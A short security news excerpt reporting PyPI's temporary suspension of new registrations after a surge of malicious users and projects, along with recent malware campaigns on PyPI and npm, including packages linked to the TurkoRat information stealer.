In a notice released on 20th May, the PyPI admins said the number of malicious users and projects created on the index "in the past week" had exceeded their capacity to quickly address.
That was exacerbated by the absence of several administrators.
While the admins didn't provide specific information about the malicious actions or actors, sources indicate that an automated attack might have been the source.
"While we re-group over the weekend, new user and new project registration is temporarily suspended," the admins added.
The outage persisted for approximately 29 hours, and the status page now displays a message noting that the suspension had been lifted.
Similar to other open-source registries, PyPI has encountered instances of adversaries exploiting it to distribute malware.
A recent discovery by Israeli cybersecurity startup Phylum revealed an ongoing malware campaign that exploits OpenAI ChatGPT-themed lures.
The attackers use the lures to entice developers into downloading a malicious Python module. The module has the ability to extract clipboard content, allowing the attackers to hijack cryptocurrency transactions.
In a similar finding, two malicious packages were detected within the npm package repository. These packages were disguised as components of an open-source information stealer malware known as TurkoRat.
The packages, nodejs-encrypt-agent and nodejs-cookie-proxy-agent, were accessible for over two months before being discovered and removed. During that time, they were collectively downloaded around 1,200 times.
ReversingLabs, which analysed the campaign, said TurkoRat is an information stealer designed to collect sensitive data, including login credentials, website cookies and information from cryptocurrency wallets.
< ..
Support the originator by clicking the read the rest link below.
